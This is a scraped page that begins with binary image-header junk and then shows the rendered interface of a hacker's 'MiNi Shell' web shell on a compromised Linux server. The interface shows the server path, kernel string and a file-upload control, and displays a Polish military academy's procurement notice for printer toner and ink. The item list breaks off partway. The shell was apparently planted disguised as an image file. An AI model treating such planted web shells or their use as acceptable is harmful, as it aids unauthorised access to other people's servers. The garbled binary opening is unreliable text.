JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240424/0030016901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów eksploatacyjnych do urządzeń drukujących </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuki Wojennej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011574244</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. gen. Antoniego Chruściela 103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-910</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.drewniak@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wojsko-polskie.pl/aszwoj/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów eksploatacyjnych do urządzeń drukujących </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-80662c1a-e755-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00300169</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00102000/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa materiałów eksploatacyjnych do urządzeń drukujących</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://akademia-mil.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://akademia-mil.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje dotyczące<br/>korzystania z Platformy, proces zakładania konta i logowania się zostały zawarte w instrukcji udostępnionej przez Zamawiającego<br/>na Platformie w zakładce „Regulacje i procedury procesu zakupowego” (https://akademia-mil.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_module=main&amp;MP_action=publicFilesList&amp;folder=000w&amp;clientName=akademia-mil&amp;).Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie<br/>Zakupowej https://akademia-mil.ezamawiajacy.pl/servlet/HomeServlet<br/>Wszyscy Wykonawcy w celu bezproblemowej komunikacji z Zamawiającym na Platformie powinni przed upływem terminu składania<br/>ofert przystąpić do postępowania na Platformie poprzez funkcję „Przystąp do postępowania” oraz posiadać założone konto w<br/>aplikacji Marketplanet OnePlace.<br/>2. W celu bezproblemowej pracy z Platformą, Wykonawca powinien posiadać co najmniej:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 56 KB/s;<br/>2) komputer klasy PC z zainstalowanym systemem operacyjnym Microsoft Windows XP/Vista/Windows 7/ Windows 10; w przypadku<br/>komputera z systemem operacyjnym Microsoft Windows 7/ Windows 8 przeglądarka MS Internet Explorer 10.0 (lub nowsza) z<br/>obsługą Active X lub dla systemów operacyjnych XP/Vista/Windows 7/Windows 8 przeglądarka Firefox z obsługą Javy, siła<br/>szyfrowania: 128bit; w przypadku komputera z systemem operacyjnym Microsoft Windows 10 przeglądarka MS Internet Explorer 11<br/>z obsługą Active X lub Firefox<br/>z obsługą Javy, siła szyfrowania: 128bit;<br/>3) zainstalowaną dowolną przeglądarkę internetową: Chrome; Mozilla Firefox;<br/>4) włączoną obsługę JavaScript;<br/>5) podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez<br/>Wykonawcę.<br/>3. Dopuszczalny format kwalifikowanego podpisu elektronicznego:<br/>1) dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy<br/>należy użyć formatu XAdES. W takiej sytuacji należy załączyć oddzielny plik<br/>z podpisem (w takiej sytuacji Wykonawca winien upewnić się, że załącza oba<br/>pliki, tj. plik z treścią dokumentu oraz plik z podpisem elektronicznym).<br/>3) Zamawiający zaleca, aby kwalifikowany podpis elektroniczny, którym posługuje się Wykonawca był podpisem wydanym na terenie<br/>Rzeczpospolitej Polskiej, bądź innych krajów należących do Unii Europejskiej.<br/>4. Obsługiwane przez Platformę formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: txt, rtf, pdf ,xps, odt,<br/>ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg,<br/>ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, PAdES, CAdES, ASIC, XMLenc.<br/>5. Każdy plik załączony i zapisany przez Wykonawcę na Platformie, widoczny jest w Systemie jako zaszyfrowany. Możliwość<br/>otworzenia pliku dostępna jest dopiero po automatycznym odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>6. Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data &#34;- czas lokalny serwera synchronizowany odpowiednim<br/>źródłem czasu.<br/>7. Format kodowania treści w obrębie platformy - UTF8.<br/>8. Cała komunikacja pomiędzy użytkownikiem Systemu a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS<br/>(szyfrowanie TLS)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych przetwarzanych w związku z prowadzeniem<br/>postępowania o udzielenie zamówienia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 2 ustawy<br/>8. Administrator wyznaczył Inspektora Ochrony Danych z którym można się skontaktować się za pośrednictwem adresu e-mail:<br/>iod@akademia.mil.pl<br/>9. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną<br/>ich przetwarzania jest art. 6 ust.1 lit. c RODO w związku z ustawą Prawo zamówień publicznych i rozporządzeniem Ministra Rozwoju<br/>w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu i udzielenie zamówienia.<br/>10. Dane osobowe przechowywane będą przez okres niezbędny, wynikający z przepisów, zgodnie z art. 78 ust. 1 ustawy Pzp, przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>11. Dane osobowe pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim<br/>zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>Ograniczenie dostępu do danych osobowych może wystąpić tylko w przypadkach jeśli jest to uzasadnione ochroną prywatności<br/>zgodnie z ustawą Prawo zamówień publicznych.<br/>12. Dane nie będą przekazywane do państwa trzeciego ani do organizacji międzynarodowej.<br/>13. Osobie, której dane dotyczą przysługuje prawo:<br/>- dostępu do danych osobowych przy czym w przypadku gdy wykonanie obowiązków,<br/>o których mowa w art. 15 ust. 1-3 RODO wymagałoby dużego wysiłku zamawiający może żądać od osoby której dane dotyczą<br/>dodatkowych informacji,<br/>- żądania sprostowania dotyczących jej danych osobowych,<br/>- ograniczenia przetwarzania w przypadkach wymienionych w RODO przy czym żądanie nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania<br/>o udzielenie zamówienia publicznego.<br/>14. Osobie której dane dotyczą nie przysługuje prawo do przenoszenia danych osobowych, ich usunięcia ani prawo wniesienia<br/>sprzeciwu, ponieważ przetwarzanie danych odbywa się na podstawie art. 6 ust.1 lit. c RODO.<br/>15. W trakcie przetwarzania danych nie będzie dochodziło do zautomatyzowanego podejmowania decyzji, ani do profilowania.<br/>16. Osobie, której dane dotyczą przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych osobowych (adres: 00-<br/>193 Warszawa, ul. Stawki 2).<br/>17. Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe ale niezbędne do wzięcia w nim udziału. Zamawiający może żądać ich podania na podstawie przepisów ustawy Prawo zamówień publicznych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Administratorem danych osobowych przetwarzanych w związku z prowadzeniem<br/>postępowania o udzielenie zamówienia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 2 ustawy<br/>8. Administrator wyznaczył Inspektora Ochrony Danych z którym można się skontaktować się za pośrednictwem adresu e-mail:<br/>iod@akademia.mil.pl<br/>9. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną<br/>ich przetwarzania jest art. 6 ust.1 lit. c RODO w związku z ustawą Prawo zamówień publicznych i rozporządzeniem Ministra Rozwoju<br/>w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu i udzielenie zamówienia.<br/>10. Dane osobowe przechowywane będą przez okres niezbędny, wynikający z przepisów, zgodnie z art. 78 ust. 1 ustawy Pzp, przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>11. Dane osobowe pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim<br/>zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>Ograniczenie dostępu do danych osobowych może wystąpić tylko w przypadkach jeśli jest to uzasadnione ochroną prywatności<br/>zgodnie z ustawą Prawo zamówień publicznych.<br/>12. Dane nie będą przekazywane do państwa trzeciego ani do organizacji międzynarodowej.<br/>13. Osobie, której dane dotyczą przysługuje prawo:<br/>- dostępu do danych osobowych przy czym w przypadku gdy wykonanie obowiązków,<br/>o których mowa w art. 15 ust. 1-3 RODO wymagałoby dużego wysiłku zamawiający może żądać od osoby której dane dotyczą<br/>dodatkowych informacji,<br/>- żądania sprostowania dotyczących jej danych osobowych,<br/>- ograniczenia przetwarzania w przypadkach wymienionych w RODO przy czym żądanie nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania<br/>o udzielenie zamówienia publicznego.<br/>14. Osobie której dane dotyczą nie przysługuje prawo do przenoszenia danych osobowych, ich usunięcia ani prawo wniesienia<br/>sprzeciwu, ponieważ przetwarzanie danych odbywa się na podstawie art. 6 ust.1 lit. c RODO.<br/>15. W trakcie przetwarzania danych nie będzie dochodziło do zautomatyzowanego podejmowania decyzji, ani do profilowania.<br/>16. Osobie, której dane dotyczą przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych osobowych (adres: 00-<br/>193 Warszawa, ul. Stawki 2).<br/>17. Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe ale niezbędne do wzięcia w nim udziału. Zamawiający może żądać ich podania na podstawie przepisów ustawy Prawo zamówień publicznych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ASzWoj-PK-ZZP.261.8.2024.AD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do urządzeń drukujących zgodnie z wymaganiami określonymi w SWZ. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1.1 do SWZ.<br/>BEBEN DO BROTHER 7840	DR2100	2 szt.<br/>BEBEN DO BROTHER HLL 9200/MFC- L9550CDWT	DR321CL 2 szt.<br/>BEBEN DO KONICA MINOLTA 284 CMY	DR512CMY	2 szt.<br/>BĘBEN DO BROTHER 6180	DR3300	1 szt.<br/>BĘBEN DO BROTHER HLL9310CDWRE1,MFCL8690CDWYJ1	DR421CL 2 szt.<br/>BĘBEN DO BROTHER MFCL6800DWYJ1	DR3400	5 szt.<br/>BĘBEN DO HP M130FN	19A/CF219A	15 szt.<br/>BĘBEN DO CANON IRA DX C 3720	C-EXV49	20 szt.<br/>POJEMNIK NA TUSZ DO EPSON ECO TANK L6290T	T04D1	2 szt.<br/>POJEMNIK NA ZUŻYTY TONER DO CANON IRADX C 3720	WT 202	10 szt.<br/>POJEMNIK NA ZUŻYTY TONER DO KONICA MINOLTA 284	WX103	4 szt.<br/>POJEMNIK NA ZUŻYTY TUSZ DO EPSON SURECOLOR SC P 600	T699700	1 szt.<br/>TAŚMA DO MAGICARD 600 DUO	MB300YMCKO	20 szt.<br/>TAŚMA DO ZEBRA TLP 2824 PLUS (TAŚMA TERMOTRANSFEROWA M240 55X74 MM BLACK WOSKOWA) 26 szt.<br/>TAŚMA DYMO WINYLOWA 19MM BIAŁA/CZARNY NADRUK DO DYMO RHINO 4200 2 szt.<br/>TAŚMA DYMO WINYLOWA 19MM NIEBIESKA/CZARNY NADRUK DO DYMO RHINO 4200 3 szt.<br/>TAŚMA DYMO WINYLOWA 19MM ŻÓŁTA/CZARNY NADRUK DO DYMO RHINO 4200 2 szt.<br/>TONER DO HP 1102W	CE 285A	1600	4 szt.<br/>TONER DO BROTHER 7840	TN3120	2500	4 szt.<br/>TONER DO BROTHER HLL 9200/MFC- L9550CDWT	TN900C	6000	15 szt.<br/>TONER DO BROTHER HLL 9200/MFC- L9550CDWT	TN 900M	6000	15 szt.<br/>TONER DO BROTHER HLL 9200/MFC- L9550CDWT	TN 900Y	6000	15 szt.<br/>TONER DO BROTHER HLL 9200/MFC- L9550CDWT	TN 900BK	6000	20 szt.<br/>TONER DO BROTHER HLL9310CDWRE1	TN 910 C	9000	1 szt.<br/>TONER DO BROTHER HLL9310CDWRE1	TN 910 M	9000	1 szt.<br/>TONER DO BROTHER HLL9310CDWRE1	TN 910 Y	9000	1 szt.<br/>TONER DO BROTHER HLL9310CDWRE1	TN 910 BK	9000	2 szt.<br/>TONER DO BROTHER MFC 8950DW/6180	TN 3390	12000	3 szt.<br/>TONER DO BROTHER MFC 9970 CDW	TN328BK	6000	2 szt.<br/>TONER DO BROTHER MFC 9970 CDW	TN328C	6000	2 szt.<br/>TONER DO BROTHER MFC 9970 CDW	TN328M	6000	2 szt.<br/>TONER DO BROTHER MFC 9970 CDW	TN328Y	6000	2 szt.<br/>TONER DO BROTHER MFCL6800DWYJ1,6400	TN 3512	12000	50 szt.<br/>TONER DO BROTHER MFCL8690CDWYJ1	TN 421 C	1800	10 szt.<br/>TONER DO BROTHER MFCL8690CDWYJ1	TN 421 M	1800	10 szt.<br/>TONER DO BROTHER MFCL8690CDWYJ1	TN 421 Y	1800	10 szt.<br/>TONER DO BROTHER MFCL8690CDWYJ1	TN 421 BK	3000	16 szt.<br/>TONER DO HP 1020	Q2612	2000	15 szt.<br/>TONER DO HP 1536	CE278A	2100	8 szt.<br/>TONER DO HP M130FN	HP 17A CF 217 A	1500	150 szt.<br/>TONER DO KONICA MINOLTA BIZHUB 223	TN 217	17500	<br/>5 szt.<br/>TONER DO KONICA MINOLTA BIZHUB 224E	TN 322	24000	15 szt.<br/>TONER DO KONICA MINOLTA C 284E	TN 321/ A33K250	25000	4 szt.<br/>TONER DO KONICA MINOLTA C 284E	TN 321/A33K350	25000	2 szt.<br/>TONER DO KONICA MINOLTA C 284E	TN 321/A33K450	25000	2 szt.<br/>TONER DO KONICA MINOLTA C 284E	TN 321/ A33K150	27000	3 szt.<br/>TONER DO BIZHUB C257I	TN 227K	27000	20 szt.<br/>TONER DO BIZHUB C257I	TN 227C	24000	15 szt.<br/>TONER DO BIZHUB C257I	TN 227M	24000	15 szt.<br/>TONER DO BIZHUB C257I	TN 227Y	24000	15 szt.<br/>TONER DO BROTHER 5250	TN 3170	7000	2 szt.<br/>TONER DO CANON IRADX C 3720	C-EXV 49 bk	36000	40 szt.<br/>TONER DO CANON IRADX C 3720	C-EXV 49 c	19000	30 szt.<br/>TONER DO CANON IRADX C 3720	C-EXV 49 m	19000	30 szt.<br/>TONER DO CANON IRADX C 3720	C-EXV 49 y	19000	30 szt.<br/>TONER DO HP M479DN	W2030X	7500	60 szt.<br/>TONER DO HP M479DN	W2031X	6000	40 szt.<br/>TONER DO HP M479DN	W2032X	6000	40 szt.<br/>TONER DO HP M479DN	W2033X	6000	40 szt.<br/>TONER DO SAMSUNG C 480	CLT-C404S	1000	2 szt.<br/>TONER DO SAMSUNG C 480	CLT-M404S	1000	2 szt.<br/>TONER DO SAMSUNG C 480	CLT-Y404S	1000	2 szt.<br/>TONER DO SAMSUNG C 480	CLT-K404S	1500	2 szt.<br/>TONER DO SHARP BP50C26EU	BPGT70BA	40000	20 szt.<br/>TONER DO SHARP BP50C26EU	BPGT70CA	24000	12 szt.<br/>TONER DO SHARP BP50C26EU	BPGT70MA	24000	12 szt.<br/>TONER DO SHARP BP50C26EU	BPGT70YA	24000	12 szt.<br/>TONER DO XEROX C 315	006R04368	8000	10 szt.<br/>TONER DO XEROX C 315	006R04369	5500	8 szt.<br/>TONER DO XEROX C 315	006R04370	5500	8 szt.<br/>TONER DO XEROX C 315	006R04371	5500	8 szt. <br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8041	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8042	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8043	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8044	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8045	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8046	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8047	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8048	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 8000	T8049	700 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7601	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7602	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7603	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7604	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7605	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7606	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7607	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7608	25,9 ml	2 szt.<br/>TUSZ DO EPSON SURECOLOR SC P 600	T7609	25,9 ml	2 szt.<br/>TUSZ DO EPSON ECO TANK L6290T 127 ML	T03V1 BK	127 ml 4 szt.<br/>TUSZ DO EPSON ECO TANK L6290T 70 ML	T03V2 C	70 ml 4 szt.<br/>TUSZ DO EPSON ECO TANK L6290T 70 ML	T03V3 M	70 ml 4 szt.<br/>TUSZ DO EPSON ECO TANK L6290T 70 ML	T03V4 Y	70 ml 4 szt.<br/>TUSZ/ATRAMENT SUBLIMACYJNY DO EPSON L1210 BLACK 65ML	C13T00S14A	65 ml	3 szt.<br/>TUSZ/ATRAMENT SUBLIMACYJNY DO EPSON L1210 CYAN 65 ML	C13T00S24A	65 ml	3 szt.<br/>TUSZ/ATRAMENT SUBLIMACYJNY DO EPSON L1210 MAGENTA 65 ML	